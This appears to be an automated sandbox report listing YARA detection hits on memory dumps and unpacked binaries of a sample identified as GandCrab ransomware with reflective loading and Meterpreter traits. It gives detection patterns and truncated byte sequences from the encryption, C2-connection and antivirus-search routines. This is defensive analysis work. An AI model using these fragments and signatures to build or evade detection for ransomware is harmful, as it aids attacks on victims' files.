00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Process Memory Space: IJr8RvvhZ3.exe PID: 732	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: IJr8RvvhZ3.exe PID: 732	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4652	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 4652	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 476	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 476	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5964	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x143cc:$xs1: WS2_32.dll 0x4f72:$xs2: ReflectiveLoader 0x4f94:$xs2: ReflectiveLoader 0xdeb7:$xs2: ReflectiveLoader 0xded9:$xs2: ReflectiveLoader 0x11483:$xs2: ReflectiveLoader 0x114a5:$xs2: ReflectiveLoader
Process Memory Space: mqsmvj.exe PID: 5964	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 5964	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5524	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x9159:$xs1: WS2_32.dll 0x9844:$xs1: WS2_32.dll 0x6ec8:$xs2: ReflectiveLoader 0x6eea:$xs2: ReflectiveLoader 0xc2fe:$xs2: ReflectiveLoader 0xc320:$xs2: ReflectiveLoader 0xfc90:$xs2: ReflectiveLoader 0xfcb2:$xs2: ReflectiveLoader
Process Memory Space: mqsmvj.exe PID: 5524	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 5524	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 3824	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5304	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 5304	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4828	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 4828	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 2228	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 244	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 244	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4940	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1921:$xs1: WS2_32.dll 0x1ec2:$xs1: WS2_32.dll 0x67f7:$xs2: ReflectiveLoader 0x6819:$xs2: ReflectiveLoader 0xa39b:$xs2: ReflectiveLoader 0xa3bd:$xs2: ReflectiveLoader 0xe32c:$xs2: ReflectiveLoader 0xe34e:$xs2: ReflectiveLoader
Process Memory Space: mqsmvj.exe PID: 4940	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 4940	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4864	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5160	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 5160	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5636	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 5636	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 2564	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 2564	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4956	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 4480	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 4480	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 5768	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 6000	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 6000	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 916	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: mqsmvj.exe PID: 3780	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: mqsmvj.exe PID: 3780	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Click to see the 181 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
23.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
23.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
23.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
23.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
23.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
28.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
28.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
28.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
28.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
28.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
28.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
27.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
27.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
27.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
27.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
27.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
27.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
38.0.mqsmvj.exe.f580000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
38.0.mqsmvj.exe.f580000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
38.0.mqsmvj.exe.f580000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
38.0.mqsmvj.exe.f580000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
38.0.mqsmvj.exe.f580000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
38.0.mqsmvj.exe.f580000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 58 0F 8B 35 44 A1 58 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 58 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 58 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 58 0F 8B 35 10 A1 58 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 58 0F C7 44 24 1C 64 F4 58 0F C7 44 24 20 80 F4 58 0F C7 44 24 24 A0 F4 58 0F C7 44 24 28 BC F4 58 0F C7 44 24 2C D8 F4 58 0F C7 44 24 30 F0 F4 58 0F C7 44 24 34 04 F5 58 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 58 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 59 0F C7 45 B8 BC 03 59 0F C7 45 BC ...
25.3.mqsmvj.exe.3490000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
25.3.mqsmvj.exe.3490000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
25.3.mqsmvj.exe.3490000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.3.mqsmvj.exe.3490000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
25.3.mqsmvj.exe.3490000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.3.mqsmvj.exe.3490000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
14.3.mqsmvj.exe.32b0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
14.3.mqsmvj.exe.32b0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
14.3.mqsmvj.exe.32b0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.3.mqsmvj.exe.32b0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
14.3.mqsmvj.exe.32b0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.3.mqsmvj.exe.32b0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
3.3.mqsmvj.exe.3790000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
